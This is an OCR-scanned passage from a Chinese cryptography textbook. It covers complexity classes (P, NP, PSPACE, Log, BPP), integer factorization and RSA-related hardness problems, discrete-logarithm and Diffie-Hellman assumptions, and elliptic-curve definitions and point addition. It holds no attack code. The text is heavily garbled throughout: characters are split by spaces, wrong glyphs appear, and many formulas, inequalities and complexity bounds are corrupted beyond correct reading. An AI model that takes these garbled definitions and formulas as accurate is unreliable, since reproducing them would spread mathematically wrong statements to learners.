(2) 顶点 覆盖 问题 。 给 定 一 个 图 G=(V,E) ,V 为 顶点 集合 ,E 为 边 集合 ,又 给 定 一 个 正 
整数 KK。 问 V 是 否 有 一 个 子 集 V' ,其 顶点 数 不 超 过 ,并 使 G 中 每 条 边 都 能 被 V' 窗 盖 , 即 
每 条 边 的 两 个 顶点 中 至 少 有 一 个 在 V' 中。 

(3) 带 优 先 次 序 的 调度 问题 。 有 m 个 处 理 机 和 一 个 任务 集合 ,每 个 任务 的 执行 时 间 为 
1, 已 知 任务 间 的 优先 次 序 (不 一 定 每 对 任务 间 都 有 优先 次 序 ) 和 一 个 截止 时 间 D。 问 是 否 有 
一 个 mm 个 处 理 机 的 调度 方法 ,满足 给 定 的 优先 次 序 , 且 在 截止 时 间 D 以 前 结束 全 部 任务 。 

(4) 可 满足 性 问题 。 对 任意 给 定 布尔 表达 式 ,是否 可 对 式 中 各 变 元 赋予 真 值 和 假 值 ,使 
该 表达 式 的 值 为 真 。 

在 采用 图 灵 于 20 世纪 30 年 代 提 出 的 理想 化 的 计算 模型 即 图 灵机 作为 标准 的 计算 工具 
的 情况 下 ,可 以 非 形式 化 地 定义 本 小 节 介 绍 的 P 类 、NP 类 和 NP 完全 问题 。 

(1) P 类 问题 。 由 确定 型 图 灵机 在 多 项 式 时 间 内 可 解 的 一 切 判 定 问题 所 组 成 的 集合 。 

(2) NP 类 问题 。 由 非 确定 型 图 灵机 在 多 项 式 时 间 内 可 计算 的 判定 问题 所 组 成 的 集合 。 

(3) NP 完全 问题 。 如 果 判 定 问 题 xE NP, 并 且 对 所 有 其 他 判定 问题 x €E NP, 都 有 x 多 
项 式 变换 到 x( 记 为 xoo7) , 则 称 判 定 问题 x 是 NP 完全 的 。 

2. 空间 复杂 性 类 

复杂 性 类 的 定义 中 本 质 上 有 3 种 属性 可 以 改变 : 感 兴趣 的 资源 (时 间 、 空 间 …… ) ,考虑 
的 问题 (判断 问题 .优化 问题 ……) 和 采用 的 计算 模型 (确定 性 图 灵机 ,概率 图 灵机 、 量 子 计 算 
机 ……)。 本 小 节 讨 论 两 个 由 计算 空间 (存储 空间 ) 定 义 的 复杂 性 类 。 

首先 介绍 的 是 PSPACE 类 。 这 个 类 的 名 字 可 以 看 做 是 P( 多 项 式 ) 十 Space( 空 间 ) 来 定 
义 的。 具体 地 说 ,PSPACE 类 是 在 图 灵机 上 用 多 项 式 数量 的 工作 比特 ,在 不 限制 时 间 的 情 
况 下 可 以 求解 的 问题 类 。 

事实 上 ,一 方面 ,P 类 是 包含 在 PSPACE 类 中 的 , 即 PCPSPACE。 因 为 在 多 项 式 时 间 
内 ,停机 的 图 灵机 只 能 访问 多 项 式 数量 的 方 格 ( 空 间或 工作 比特 ); 另 一 方面 , NP 也 是 
PSPACE 类 的 子 集 ,NPSPSPACE。 简 证 如 下 : 设 L 是 NP 类 中 的 任 一 语言 , 设 规模 为 n 的 
问题 的 证 据 至 多 是 p(n) 规 模 的 ,其 中 p(n) 是 的 某 个 多 项 式 。 为 确定 该 问题 是 否 有 解 , 可 
以 顺序 测试 全 部 22” 个 可 能 证 据 , 每 个 测试 的 执行 时 间 是 多 项 式 的 ,因而 也 只 能 用 到 多 项 式 
空间 。 因 此 ,NP 类 也 是 包含 在 PSPACE 类 中 间 的 。 


同 P 和 关 NP 问题 类 似 , 至 今 为 止 ,仍然 不 知道 P 冯 PSPACE 是 否 成 立 。 即 仍然 无 法 确定 
PSPACE 类 中 是 否 包含 不 在 P 类 中 的 问题 。 

另 一 个 空间 复杂 性 类 是 Log。Log 包含 所 有 由 图 灵机 在 对 数 空间 ( 即 O(log(Cz))) 内 可 
以 判定 的 判定 问题 。 更 确切 地 ,类 Log 用 一 个 双 带 图 灵机 来 定义 ,第 一 条 带子 包含 问题 的 
实例 ,规模 为 n, 是 一 条 只 读 的 带子 , 即 只 允许 访问 而 不 允许 改变 第 一 条 带子 内 容 的 程序 行 ; 
第 二 条 带子 是 初始 空白 的 工作 带 ,对 数 空间 的 限制 是 针对 第 二 条 带子 的 。 

一 般 地 ,有 如 下 结论 : 

Log ES PENPCSPSPACE (2-12) 

3. BPP 

本 小 节 主 要 介绍 一 个 概率 算法 (引入 图 灵机 内 部 的 硬币 投掷 机 制 ) 的 复杂 性 类 一 一 BPP 
(Bounded-error Probabilistic time) 类 。 

所 谓 概率 算法 ,就 是 在 算法 的 过 程 中 引入 随机 数 ,使 得 算法 在 执行 的 过 程 中 随机 选择 下 
一 个 计算 步骤 。 它 最 后 可 能 导致 结果 也 是 不 确定 的 。 一 个 结果 不 确定 的 概率 算法 称 为 
Monte Carlo 算法 ,而 总 是 得 到 准确 解 的 概率 算法 叫做 Sherwood 算法 (一 个 例子 是 引进 随 
机 因子 的 快速 排序 算法 ) 。 对 于 Monte Carfo 算法 , 它 的 输出 是 不 精确 的 ,这 种 牺牲 使 得 算 
法 能 够 在 较 短 时 间 内 完成 。 

引入 概率 算法 后 ,图 灵机 增加 了 投掷 硬币 的 能 力 , 靠 掷 硬币 的 结果 决定 计算 过 程 中 的 动 
作 , 这 样 的 图 灵机 只 能 以 一 定 的 概率 接受 或 拒绝 输入 。 针 对 这 种 计算 的 复杂 度 类 就 是 一 种 
(以 高 概率 ) 可 被 概率 多 项 式 时 间 图 灵机 理解 的 语言 类 ,也 就 是 BPP, 其 严格 的 定义 如 下 : 

定义 2.20 (有 界 概 率 多 项 式 时 间 ,BPP) 如 果 满 足以 下 条 件 : 


(1) 对 于 每 一 个 zxEL,PrLM(z) 一 1] 之 子 成 立 ; 


(2) 对 于 每 一 个 zL,PrLM(z) 一 0] 之 也 成 立 ， 


则 称 工 是 可 被 概率 多 项 式 时 间 图 灵机 M 识别 的 。 

定义 中 的 “有 界 概率 ” 指 的 主要 是 成 功 概率 要 大 于 1/2. 事 实 上 ,将 定义 2. 20 中 的 2/3 
换 为 其 他 的 界 于 1/2 和 1 之 间 的 常数 都 不 会 改变 定义 的 类 ,例如 3/4、0.69 等 。 类 似 地 , 常 
数 2/3 如 果 被 1 一 2 局 取代 ,该 类 也 不 变 。 结 论 : BPP 中 的 语言 可 以 被 概率 多 项 式 时 间 图 灵 
机 识别 ,而 错误 概率 可 以 忽略 不 计 。 


2.6 计算 困难 问题 及 其 假设 


2.6.1 大 整数 因子 分 解 问题 和 RSA 问题 


定义 2.21 整数 因子 分 解 问题 (The Integer Factorization Problem): 给 定 整 数 n, 对 
进行 因子 分 解 a 二 pi p2…p% ,pi; 是 不 同 的 素数 ,e; 是 正 整 数 。 整 数 分 解 的 算法 复杂 度 可 分 
为 以 下 两 种 情况 讨论 。 

(1) 普通 算法 。 算 法 复杂 度 与 2 的 大 小 有 关 , 如 应 用 二 次 得 法 和 普通 数 域 得 法 对 ” 进 
行 因 子 分 解 。 较 高 效 的 数 域 得 法 (Number Field Sieve) 的 运行 时 间 为 O(y7) 一 0(24 ),k 渡 
logzn 为 大 整数 的 比特 长 度 。 
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(2) 特殊 算法 。 这 些 算 法 的 运行 时 间 依 赖 于 的 某 些 特性 ,比如 最 大 素 因 子 的 大 小 。 若 n 
有 小 素 因 子 p, 用 椭圆 曲线 方法 分 解 大 整数 的 运行 时 间 为 O[ exp(1 十 0(1) V2Inp* In Inp)]。 

通过 上 述 可 以 看 出 ,到 目前 为 止 ,对 于 长 度 为 比特 的 大 整数 ,大 数 分 解 算法 的 复杂 度 
是 指数 时 间 的 (O(c ”) ,其 中 为 一 个 大 于 1 的 常数 ,f(n) 是 输入 规模 为 n 的 多 项 式 函数 )， 
随 着 大 整数 的 比特 长 度 增长 而 变 得 越 来 越 困 难 。 

下 面 介 绍 与 整数 分 解 紧密 相关 的 RSA 问题 及 其 衍生 困难 问题 。 

设 大 整数 为 两 个 秘密 大 素数 p、g 的 乘积 。 计算 欧 拉 函数 p(n) 二 (p 一 1)(g 一 1), 设 
0 一 (zll 委 zs 和 p 且 gcdCzyp(z)) 一 1) ,选取 公开 密 钥 ecEQ, 并 私下 计算 保存 私 钥 4d, 其 中 
ed 二 1 mod(g(n))。 就 目前 的 计算 机 能 力 而 言 ,n 为 1024 比特 甚至 2048 比特 才 是 安全 的 。 
若 素 数 p、g 随机 选择 且 比 特长 度 相等 , 即 p==2p' 十 1,q 二 2g 十 1,1p| 二 19| 宇 512bit, 则 能 较 
好 地 避免 一 些 已 知 攻击 。 

定义 2.22 RSA 问题 : 给 定 公 钥 (n ,e) 及 密 文 c= 二 m* mod n, 求 加 密 消 息 mm。 

RSA 问题 的 难 解 性 是 RSA 公 钥 加 密 方案 和 RSA 签名 方案 的 安全 性 的 基础 。 换 言 之 ， 
RSA 问题 是 求解 模 合 数 的 e 次 根 。 尽 管 现在 仍 未 给 出 证 明 , 但 人 们 还 是 普遍 地 认为 RSA 
问题 和 整数 因子 分 解 问题 完全 等 价 。 

定义 2.23 计算 性 Dependent RSA 问题 (Computational Dependent RSA,CDRSA): 
已 知 nve 和 aE2;* ,其 中 a 二 x*mod n,TERZ?, 求 (x 十 1)* mod n。 

定义 2.24 提取 性 Dependent RSA 问题 (Extraction Dependent RSA,EDRSA); 已 知 
nve 和 a 二 x* mod n,B 二 (z+ 十 1)*mod n, YXEZ;,X 闫 0, 计算 zEZ;*。 

定义 2.25 判定 性 Dependent RSA 问题 (DDRSA): 已 知 n、e 和 一 数 对 (a,p) (a,BE 
2 ) ,以 大 于 1/2 的 概率 判断 (a,B) 属 于 Rand 集合 还 是 Dependent 集合 。 其 中 

Rand 集 ={(a,B)|x* mod za,(Cy 十 1)mod zzyyERZ; } 

Dependent 集 ={(a,B)|x* mod mn,Cz 十 1)cmod n,rErZ» } 

可 以 通过 以 下 定理 ,证 明 上 述 若干 问题 中 的 困难 性 关系 。 

定理 2.15 CDRSA 二 EDRSASSRSASCDRSA .EDRSASDDRSA。 

证 明 : 先 来 证 明 RSA 仿 CDRSA 十 EDRSA。 设 算法 A 能 解 EDRSA 问题 ,而 算法 B 能 
解 CDRSA 问题 , 则 已 知 其 中 ne、a 二 x mod n, 算 法 A 能 求 出 (z 十 1) mod n。 算 法 B 承接 
算法 A 的 结果 ,已 知 a=x* mod n,B 二 (x 十 1)* mod n, 算 法 B 计 算出 zxEZ; , 即 算法 A 与 算 
法 B 联 合 解决 了 RSA 问题 。 反 过 来 , 若 算法 C 能 解决 RSA 问题 , 即 已 知 公 钥 n、e 和 密 文 
ca 一 ze mod n, 算 法 C 能 解 出 被 加 密 消息 xz€ 2Z; , 则 算法 C 能 求解 (z 十 1) mod n, 所 以 算法 
C 解 决 了 CDRSA 与 EDRSA 问题 。 

接 下 来 证 明 CDRSA,EDRSA 今 DDRSA。 设 算法 A 能 有 效 解决 CDRSA 问题 , 则 已 知 
me 一 Le mod n, 算 法 A 能 求 出 8 二 (z 十 1)* mod n, 那 么 算法 A 能 从 (a,B) (a 二 x* mod 台中 
计算 8'=(z 十 1D)* mod n, 比 较 B' 与 8 是否 相等 ,从 而 判决 (a,B) 属 于 哪个 集合 。 同 样 设 算法 
B 能 有 效 解 决 EDRSA 问题 ,已 知 a 二 x* mod n,B 二 (x 十 1)* mod n, 算 法 B 能 计算 出 xz mod 
n, 那 么 算法 B 也 能 从 给 定 的 (a,B) 中 试 着 去 求 x mod n, 若 能 计算 出 来 , 则 能 判决 (a,B8) 属 于 
Dependent 集 , 否 则 判决 (a,B) 属 于 Rand 集 。 

定理 2.16 对 于 某 些 大 指数 。( 即 使 是 固定 的 ),CDRSA 问题 和 RSA 问题 具有 相同 的 
困难 性 。 


定理 2.17 若 公 钥 指数 e 大 于 2”, 对 于 某 个 较 大 的 模 数 n( 宇 1024bit) ,DDRSA 问题 是 
难 解 的 。 

对 应 3 个 问题 有 以 下 3 种 假设 。 

定义 2.26 CDRSA 假设 : 在 RSA 问题 中 模 数 n 足够 大 的 情况 下 (ln| 宇 1024bit 且 
In| 二 1024k,kEZ1), 对 于 任意 多 项 式 时 间 算法 A,Succ 吕 只 一 PrLCz 十 1) mod nAl(e,z" 
mod n,X 关 0 上 且 zERkZ; )] 是 可 忽略 的 。 

定义 2.27 EDRSA 假设 : 在 RSA 问题 中 公 钥 |e| 宇 60bit 的 假设 下 ,对 于 任意 多 项 式 
时 间 算 法 A,SuccRRi 一 PrLzEZ < 一 A(ezc modm,Vz 天 0 且 xERZ;*)] 是 可 忽略 的 。 

定义 2.28 DDRSA 假设 : 对 任意 多 项 式 时 间 算 法 A, 成 功 解决 DDRSA 问题 的 概率 


Advppg 了 8 一 |Pr[(a,P)ERand 或 (a,B) € Dependent<A(e,a,B)]— 加 | 是 可 忽略 的 。 


2.6.2 离散 对 数 和 Diffie-Hellman 问题 


定义 2.29 离散 对 数 : 设 G 是 一 个 有 限 循环 群 且 gE€G 是 G 的 一 个 生成 元 。 元 素 a€ 
G 的 离散 对 数 是 指 存在 唯一 的 整数 x,(0 三 x 三 |G|), 使 得 a 二 g” 成 立 。 记 为 : x 二 logs a , 若 
8 不 是 生成 元 ,a 基于 g 的 离散 对 数 ( 若 存 在 ) 是 指 最 小 的 正 整数 ,使 + 二 logs a 成 立 。 

定义 2.30 离散 对 数 问题 (Discrete Logarithm Problem,DLP): 对 于 一 个 有 限 循环 群 
G= 二 g 二 和 元 素 aE€G, 求 整数 zx, (0 二 x 二 1G|) 使 +==logs a 成 立 。 

离散 对 数 的 算法 复杂 度 : 对 于 一 个 循环 群 G== 二 g 二 ,离散 对 数 的 计算 复杂 度 可 分 为 以 
下 3 种 情况 讨论 。 

(1) 群 中 所 用 的 一 般 算法 。 对 于 可 以 构造 的 最 简单 算法 当然 是 穷尽 搜索 法 ,如 计算 g?， 
Pa 82 直到 找到 为 止 。 这 需要 0(n) 计 算 复杂 度 。Baby-step/Giant-step 算法 效率 较 
高 ,算法 复杂 度 为 O(Ynlog(n)) 且 需要 存储 Vn 个 元 素 的 内 存 。 

(2) 可 以 对 任意 群 都 使 用 的 算法 ,尤其 是 群 的 阶 仅 可 分 解 为 小 素数 因子 的 乘积 时 ,效率 较 


高 。 在 这 种 情况 下 可 使 用 Pohlig_Hellman 算法 ,其 算法 复杂 度 为 o Dadent /5D)]. 


(3) 对 一 些 特别 构造 的 群 (如 Z; 和 Zir , 户 是 素数 ) 所 用 的 指数 积分 法 (Index 
Calculus Algorithm) ,运行 时 间 的 上 限 为 O(exp(c 十 O(1) Ving* Ining)), 这 里 g= 二 p 或 
2"” ,常数 c 二 0。 对 么 最 高 效 的 算法 是 数 域 筛 法 (Number Field Sieve), 需要 
O(exp(1.92 十 O(1))(lnp) 寺 (lnlnp) 计 ) 的 计算 复杂 度 。 

定义 2.31 计算 性 Diffie-Hellman 问题 (CDHP): 对 于 一 个 有 限 循 环 群 G 和 它 的 生成 
元 g ,以 及 两 个 元 素 g* 和 g" ,寻找 对 应 的 元 素 g” 。 

离散 对 数 问题 和 计算 性 Diffie-Hellman 问题 的 计算 困难 性 是 否 等 价 ,还 没有 定论 。 但 
若 DLP 在 多 项 式 时间 ? 内 可 解 , 则 CDHP 在 多 项 式 时 间 内 也 可 解 。 这 是 由 于 先 计 算 “一 
logs(g") ,然后 计算 (g*)* 即 可 。 反 之 是 否 成 立 , 到 目前 为 止 还 没有 解决 ,不 过 在 某 些 特殊 群 
中 ,这 两 个 问题 的 计算 量 是 相当 的 。 


@ 设 A 是 一 个 算法 , 它 以 串 工 作为 输入 ,如 果 存 在 一 个 多 项 式 函 数 p() ,使 得 算法 A 至 多 在 p(|z|) 步 内 可 解 , 则 
称 A 是 多 项 式 时 间 的 。 
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定义 2.32 判定 性 Diffie-Hellman 问题 DDHP) : 对 于 有 限 循环 群 G 和 它 的 一 个 生成 
元 g 以 及 3 个 元 素 g*、g*、g* ,判断 g”“ 与 g” 是否 相等 。 显 然 ,车 有 算法 A 能 解决 CDHP 问 
题 , 则 算法 A 已 知 两 个 元 素 g* 和 gg*, 解 出 对 应 的 元 素 g” ,与 g” 比较 是 否 相等 ,从 而 能 解决 
DDHP。 

定义 2.33 ”Gap Diffie-HellmanCGDHP) 问 题 : 给 定 三 元 组 (g,g*,g*)( 其 中 ,随机 元 素 
a,bERZi ), 在 DDH(。) 预 言 机 的 辅助 下 计算 g*。 

对 应 4 个 问题 有 以 下 4 个 假设 。 

定义 2.34 DLP 假设 : 称 群 G 满足 DL 假设 ,如 果 对 于 足够 大 的 安全 参数 ,任意 概率 
多 项 式 时 间 算 法 A, 满 足 

Pr[A(G,g,Y = g*) = zx] < el(k) 

其 中 ,x,yE€E Zi ,el(k) 是 可 忽略 的 。 

定义 2.35 (CDHP 假设 ): 称 群 G 满足 CDH 假设 ,如 果 对 于 足够 大 的 安全 参数 上 , 任 
意 概率 多 项 式 时 间 算法 A ,满足 

Pr[A(G,g,X= g’,Y = g*)= g?]<e(k) 

其 中 ,DDH(。),e(k) 是 可 忽略 的 。 

显然 ,如 果 可 以 求解 群 G 中 DL 问题 ,那么 也 可 以 解决 CDH 问题 。 但 是 ,反之 却 是 一 
个 公开 问题 。 

定义 2.36 (DDHP 假设 ): 称 群 G 满足 DDH 假设 ,如 果 对 于 足够 大 的 安全 参数 上 , 任 
意 概率 多 项 式 时 间 算法 A ,满足 
|Pr[A(G,g,X = 8g,Y = g’,g™)=1]—PriA(G,g,X= gg,Y = g’,g°) = 1] |<e(k) 
其 中 ,x,y,zE Zi ,el(k) 是 可 忽略 的 。 

定义 2.37 (GDH 假设 ): 称 群 G 满足 GDH 假设 ,如 果 对 于 足够 大 的 安全 参数 &, 任 
意 概率 多 项 式 时 间 算 法 A ,满足 

PrLADDRO KGg,X 一 8 了 一 8) 一 852] 入 se) 

其 中 ,zy,zE2Zy ,el(k) 是 可 忽略 的 ,并 且 算 法 A 可 以 调用 DDH(。) 预 言 机 。 

非 形式 化 地 讲 ,GDH 假设 指 的 是 ,在 敌手 可 以 查询 DDH 预言 机 的 情况 下 ,CDH 假设 
仍然 是 成 立 的。 因此 ,CDH 假设 比 GDH 假设 弱 。 


2.6.3 梢 加 曲线 和 双 线 性 对 问题 


椭圆 曲线 群 具 有 点 长 度 短 .运算 速度 快 的 优点 ,是 目前 构建 公 钥 密码 体制 一 种 较为 理想 
的 理论 基础 。 双 线性 对 是 一 种 具有 特殊 性 质 的 数学 映射 ,目前 只 能 通过 定义 在 ( 超 ) 椭 圆 曲 
线 上 的 Weil 对 和 Tate 对 得 到 。 椭 圆 曲 线 和 双 线 性 对 是 构造 基于 身份 密码 体制 的 重要 工 
具 , 本 节 给 出 了 相关 的 概念 性质 及 实现 。 

椭圆 曲线 的 特殊 结构 使 其 相 比 于 定义 在 普通 有 限 域 上 的 公 钥 算法 如 RSA, 具 有 更 高 的 
安全 强度 和 更 低 的 运算 开销 ,因此 成 为 构造 密码 体制 的 一 种 理想 理论 基础 。 

1. 有 限 域 上 的 椭圆 曲线 

设 是 一 个 域 ,K 表示 KK 的 代数 闭 域 ,K" = 二 K/{0} 表 示 域 K 中 的 非 零 元 所 形成 的 乘 
法 群 。 

定义 2.38 称 集合 KXK 为 域 K 上 的 仿 射 平面 (Affine Plane), 记 作 A?(K)。 即 : 


A(K)=KXK={(z,y):z,yEK}, 称 P=(zx, y) 为 仿 射 平面 A*(K) 上 的 点 。 

定义 2.39 既 约 多 项 式 CE KL[LX,Y] 的 所 有 零点 ( 即 以 方程 C(x, y) 二 0 的 解 为 坐标 的 
点 ) 所 形成 的 集合 称 为 域 K 上 的 仿 射 平面 曲线 (Affine Plan Curve), 记 作 C={(zx,y)€ 
A2:( 开 ) :CCz,y) 一 0)。 

定义 2.40 设 C 是 一 条 仿 射 平面 曲线 ,P= 二 (z, y) 是 C 上 的 一 点 ,如 果 : 


9 Bl 
Ry) = 守 (z 一 0 


则 称 点 已 为 曲线 C 的 一 个 奇异 点 。 如 果 一 条 曲线 存在 奇异 点 , 则 称 该 曲线 为 奇异 曲线 , 否 
则 称 该 曲线 为 非 奇 异 曲 线 。 
定义 2.41 满足 Weierstrass 方程 
E:y’+azxytasy 一 2 十 asz2 十 ai 十 as (2-13) 
的 非 奇 异 曲 线 和 无 穷 远 点 O 所 形成 的 集合 , 称 为 椭圆 曲线 。 记 作 
E= {(x,y) EA:(K):E(zy) = 0} U {0} 

如 果 aaz yasvyassas EK, 则 称 EE 为 K 上 的 椭圆 曲线 , 记 作 E/K。 

如 果 P= 二 (z, yy) 是 椭圆 曲线 玉 上 的 点 ,并 且 满 足 条 件 z+,，y EK, 则 称 点 PP 为 K- 有 理 
点 。 椭圆 曲线 E/K 上 的 点 可 以 构成 点 群 E(K), 它 是 由 所 有 K- 有 理 点 再 加 上 无 穷 远 点 O 
构成 的 集合 , 即 

E(K) = {(z,y):rsy € K,E(zr,y) = 0} U {0O} 

令 bs=a? 二 4as ;b=2a4 二 aas ,be =a$ 二 4ao ,bs =a?iae4asae—aiasaasa? —ai,c, 
如 一 24b4 ,定义 曲线 巨 的 判别 式 为 6(E) 二 一 如 bs 一 86i 一 2763 十 9b2b4bs，Weierstrass 方程 所 
确定 的 曲线 是 奇异 的 当 且 仅 当 其 判别 式 6 二 0。 由 于 椭圆 曲线 EE 是 非 奇 异 的 ,所 以 6 隆 0。 进 
一 步 定义 椭圆 曲线 的 广 不 变量 为 CE) 一 ci/6(CE) 。 

定义 2.42 设 E/K 和 E,/K 是 域 K 上 的 两 条 椭圆 曲线 ,如 果 存 在 u€EK"* ,r,s,1EK， 
使 得 变换 (xz,y) 一 (wz 十 rvsy 十 wsz 十 t) 恰 好 把 方程 已 转化 成 Es, 则 称 E1/K 和 E。/K 
是 同 构 的 , 记 作 Ei/K 室 E,/K。 

易 知 , 同 构 的 椭圆 曲线 具有 相同 的 ;不 变量 。 

令 开 一 书 为 含有 pp 二 Char'(K) 个 元 素 的 有 限 域 ,其 中 1 是 某 个 正 整 数 ,Char(K) 是 域 
K 的 特征 值 。 此 时 域 K 的 代数 闭 域 K 一 Fz. 

同 构 的 椭圆 曲线 具有 相同 的 几何 性 质 , 所 以 我 们 总 是 拿 出 每 个 同 构 类 中 方程 结构 最 为 
简单 的 一 类 进行 研究 , 称 这 一 类 曲线 为 椭圆 曲线 的 标准 型 。 有 限 域 K 二 FF, 上 的 椭圆 曲线 的 
标准 型 如 下 

(1) 当 Char(K) 关 2,3 时 ,曲线 的 标准 型 为 


史 一 好 十 az 十 as (2-14) 

(2) 当 Char(CK) 一 2 天 0 时 ,曲线 的 标准 型 为 
yy 二 zy = Zz 十 asz’! 十 a (2-15) 

(3) 当 Char(K)==2,j 二 0 时 ,曲线 的 标准 型 为 
yy 二 asy = 二 十 mz 十 as (2-16) 

(4) 当 Char(K)= 二 3,j 关 0 时 ,曲线 的 标准 型 为 
y= 十 x? 十 as (2-17) 
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(5) 当 Char(K)==3,j 二 0 时 ,曲线 的 标准 型 为 
曙 一 妇 十 az 十 as (2-18) 

2. 椭圆 曲线 群 运算 

在 如 下 定义 的 群 加 法 下 ,E(K) 形 成 一 个 加 法 群 ,其 中 的 零 元 即 为 0。 

定义 2.43 (椭圆 曲线 群 加 法 ) 设 P 和 Q 是 EE 上 的 两 点 ,如 果 P 隆 Q, 过 点 P 和 Q 作 直 
线 , 称 为 曲线 已 的 弦 , 如 果 P=Q, 过 点 己 作 巨 的 切线 。 设 该 直线 与 曲线 下 的 第 三 个 交点 为 
尺 , 过 点 尺 做 垂 线 交 曲线 EE 于 点 R'( 另 外 一 个 交点 是 无 穷 远 点 O) 。 于 是 我 们 可 以 定义 点 的 
加 法 运算 为 P 十 Q=R'。 

椭圆 曲线 群 加 法 又 称 作 “ 弦 切 法 ”。 根 据 上 述 几何 描述 ,我 们 可 以 给 出 点 的 加 法 运算 的 
坐标 表示 形式 。 设 P= (zw),Q=(zy), 如 果 忆 和 Q 满足 条 件 : 

1 T2292 0 QIZ1 Q3 

那么 P+Q=O, 即 Q= 一 P。 否 则 设 R' 二 (xs,y3),R 二 P 十 Q 的 坐标 表示 如 下 : 

(1) 在 一 般 情 形 下 , 即 曲线 巨 的 方程 如 式 (2-13) 时 , 令 


> 


1 th | PQ 
Xs—x 
4=1 ， (2-19) 
3 好 十 2aszi 十 au 一 ay P=Q 
2y 十 aizl 十 as 


那么 zs 一 十 ai 一 az 一 Zi 一 Za yy3 一 1 人 (ZI 一 zs) 一 一 QZs 一 aa。 
(2) 当 Char(K) 隆 2,3 时 ,曲线 顾 的 方程 可 简化 为 式 (2-14) , 令 
于 一 以 PQ 
4 二 (2-20) 


那么 x3 二 和 一 一 X23 一 A(T 一 XT3) 一 y16 


(3) 当 Char(K)==2,j 关 0 时 ,曲线 下 的 方程 可 简化 为 式 (2-15) , 令 


FE 
=1 (2-21) 
TT P=Q 
1 


那么 zs 一 电 十 人 十 az 十 zi 十 zzyys 一 MCzi 十 za) 十 zs 十 yi 
(4) 当 Char(K) 一 2 一 0 时 ,曲线 忆 的 方程 可 简化 为 式 (2-16) , 令 


sa | 
二 二 去 PQ 

A= (2-22) 
TX1T XT P=Q 


as 


那么 z= 和 十 zi 十 zz ,ys 二 A(Xzi 十 zs) 十 yi 十 as。 

当 Char(K) 二 3 时 ,曲线 上 点 的 加 法 公式 不 作 具 体 讨论 ,可 按 情形 (1) 曲 线 上 点 的 一 般 
加 法 公式 进行 计算 。 

从 椭圆 曲线 群 加 法 的 计算 公式 可 知 : 曲线 E/K 上 两 个 K- 有 理 点 的 和 仍然 是 一 个 K- 有 
理 点 , 即 E(K) 在 上 述 加 法 运算 下 是 封闭 的 ,E(K) 在 上 述 定 义 下 形成 一 个 加 法 群 ,并 且 该 群 


是 一 个 阿 贝尔 群 。 
由 于 乘法 运算 可 以 利用 加 法 运算 表示 ,因此 可 以 类 似 地 定义 EE 上 点 的 标量 积 或 数 乘 : 
给 定 mE2Z ,PEE, 当 m 这 0 时 , 令 mP==P 十 P 十 P 二 … 十 P; 当 m 一 0 时 , 令 mP= 二 0O; 当 
mw 次 
m 达 0 时 , 令 mP=( 一 m)P。 


定义 2.44 如果 点 PEE 满足 条 件 nP 一 O, 则 称 点 P 卫 为 nr- 挠 点。 

设 E[n] 是 曲线 玉 上 所 有 ww 挠 点 的 集合 , 即 E[n] 二 {PEE(K):nP 一 0)。 对 任意 的 Pi， 
Ps EE[nj, 因 为 n(Pi 十 P;) 二 0O 十 0 二 0O, 所 以 Pi 十 P, EE[n], 即 E[n] 在 曲线 上 点 的 加 法 运 
算 下 形成 一 个 加 法 群 , 称 之 为 n- 挠 群 。 

定义 2.45 设 E/F， 是 定义 在 有 限 域 下 ,上 的 椭圆 曲线 , 称 满足 间 E(F,) 二 p 十 1 一 t 的 
变量 1 为 Frobenius 迹 。 其 中 #E(F,) 表 示 椭 圆 曲 线 E/F, 上 有 理 点 的 个 数 。 

定理 2.18 Frobenius 迹 1 满 足 不 等 式 |t| 三 2Vp。 

有 限 域 F, 上 的 椭圆 曲线 玉 /F,。 上 有 理 点 的 个 数 #E(F,) 一 定 是 有 限 的 ,至 多 有 p? 个 。 
该 定理 给 出 了 #E(F,) 的 大 致 范围 ,对 于 大 的 p,#E(F,) 的 值 大 约 是 p 十 1。 

3. 椭圆 曲线 上 的 困难 问题 

已 知 E/F, 上 的 点 P, 给 定点 对 (P,mP), 求 整数 mE 2Z,., 这 个 问题 称 为 椭圆 曲线 离散 
对 数 问 题 ,简写 为 ECDL 问题 。 当 点 P 有 大 的 素数 阶 时 ,普遍 认为 求解 ECDL 问题 是 计算 
上 不 可 行 的 。 

利用 现 有 算法 求解 ECDL 问题 所 能 达到 的 最 低 的 时 间 复 杂 度 约 为 O(Yp),O(Vp) 与 p 
的 规模 成 指数 关系 ,这 近乎 利用 生日 悖 论 所 进行 的 强力 搜索 法 得 到 的 结果 。 对 于 有 限 域 中 
的 离散 对 数 问题 ,存在 称 为 指数 积分 (Index calculus) 的 算法 。 在 有 限 域 中 求解 该 算法 的 时 
间 复 杂 度 存在 一 个 亚 指数 表达 式 sub_exp(p)。 对 于 同样 的 输入 ,OC(Vp ) 作 为 一 个 大 数 的 函 
数 ,其 增长 速度 远大 于 亚 指数 函数 sub_exp(p)。 这 意味 着 求解 这 两 个 问题 时 ,在 有 限 域 规 
模 相同 时 ,ECDL 问题 的 求解 难度 要 远大 于 普通 离散 对 数 问 题 的 求解 难度 。 反 言 之 ,为 达到 
相同 的 求解 难度 ( 即 安全 水 平 ),ECDL 问题 的 基 域 规模 远 小 于 普通 离散 对 数 问题 的 基 域 规 
模 。 对 于 ECDL 问题 ,通常 令 p 守 21”, 此 时 抗 强力 搜索 法 的 难度 是 2” 数 量 级 的 ; 为 使 有 限 
域 上 的 离散 对 数 问题 获得 相似 的 难度 , 亚 指 数 表达 式 通常 需要 p 达到 2” 数 量 级 。 因 此 ， 
在 相等 的 安全 等 级 下 ,椭圆 曲线 密码 体制 比 基 于 有 限 域 的 公 钥 密码 体制 具有 更 小 的 密 钥 长 
度 、 更 小 的 内 存 需求 量 和 更 快 的 计算 速度 。 

由 ECDL 问题 可 获得 一 些 相 关 的 困难 问题 ,这 些 问题 构成 了 许多 椭圆 曲线 上 密码 算法 
的 安全 基础 。 

定义 2.46 〈 计 算 性 Diffie-Hellman(CDH) 问 题 ) 给 定 aP,b5PEE(F,), 计 算 Q=abP 
EE(F,), 这 里 a,bEZ; 是 未 知 的 。 

定义 2.47 (判定 性 Diffie-Hellman(DDH) 问 题 ) 从 (aP, bP, cP) 中 将 形 如 (aP, bP， 
abP) 的 三 元 组 区 别 开 来 ,这 里 a.5EZ; 是 未 知 的 。 

定义 2.48 〈 除 法 性 计算 性 Diffie-Hellman(DCDH) 问 题 ) 给 定 aP,bPEE(F,), 计 算 


Q= 人 PEE(CF,), 这 里 aoEZ; 是 未 知 的 。 
